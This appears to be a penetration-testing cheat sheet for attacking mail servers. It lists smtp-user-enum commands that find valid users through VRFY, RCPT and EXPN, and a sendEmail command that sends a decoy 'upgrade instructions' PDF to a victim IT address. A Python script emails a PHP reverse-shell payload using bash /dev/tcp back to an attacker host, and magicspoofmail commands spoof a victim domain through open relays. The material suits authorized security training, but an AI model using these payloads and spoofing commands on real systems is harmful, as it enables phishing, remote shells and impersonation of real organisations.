SMTP supports several interesting commands, such as VRFY, EXPN and RCPT TO.
VRFY requests asks the server to verify an email address.
EXPN asks the server for the membership of a mailing list.
RCPT TO is used to specify an email recipient but may trigger an "Unknown user" error if the specified user does not exist.
These can often be abused to verify existing users on a mail server, which is useful information during a penetration test.
# VRFY - check if the user exists in the SMTP server
smtp-user-enum -M VRFY -u <username> -t <target-ip>
smtp-user-enum -M VRFY -U usernames.txt -t <target-ip>
# RCPT - check if the user is allowed to receive mails in the SMTP server
smtp-user-enum -M RCPT -u <username> -t <target-ip>
smtp-user-enum -M RCPT -U usernames.txt -t <target-ip>
# EXPN - reveal the actual email address
smtp-user-enum -M EXPN -u <username> -t <target-ip>
smtp-user-enum -M EXPN -D <hostname> -U usernames.txt -t <target-ip>
# Send with email attahement
sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s <SMTP_SRV_IP> -u "Important Upgrade Instructions" -a /tmp/BestComputers-UpgradeInstructions.pdf
We may use following python script to send emails
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys
lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25 # 489,587
# create message object instance
msg = MIMEMultipart()
# setup the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"
# payload
message = ("<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost,lport))
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))
server = smtplib.SMTP(host=rhost,port=rport)
if server.noop()[0] != 250:
print("[-]Connection Error")
exit()
server.starttls()
# Uncomment if log-in with authencation
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***]successfully sent email to %s:" % (msg['To']))
Mail Spoofing
Open Relay
To prevent the sent emails from being filtered by spam filters and not reaching the recipient, the sender can use a relay server that the recipient trusts. Often, administrators haven't overviewed of which IP ranges they have to allow. This results in a misconfiguration of the SMTP server that we will still often find in external and internal penetration tests. Therefore, they allow all IP addresses not to cause errors in the email traffic and thus not to disturb or unintentionally interrupt the communication with potential and current customers:
mynetworks = 0.0.0.0/0
nmap -p25 --script smtp-open-relay <IP> -v
Tools
# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
Resources
is a python script for user enumeration via VRFY, EXPN and RCPT
We may use the nmap's script
If the server supports NTLM auth (Windows) you can obtain sensitive info (versions). More information .
We may use the nmap's script
We may use the nmap's script
is a swiss army knife for SMTP and can be used to send emails from external domain
is a lightweight, completely command line based, SMTP email agent.
We may use the script to enumerate if a SMTP server is vulnerable to mail relaying.
is a python script that checks & test SPF/DMARC DNS records an tries to spoof a domain with a open relay mail system.
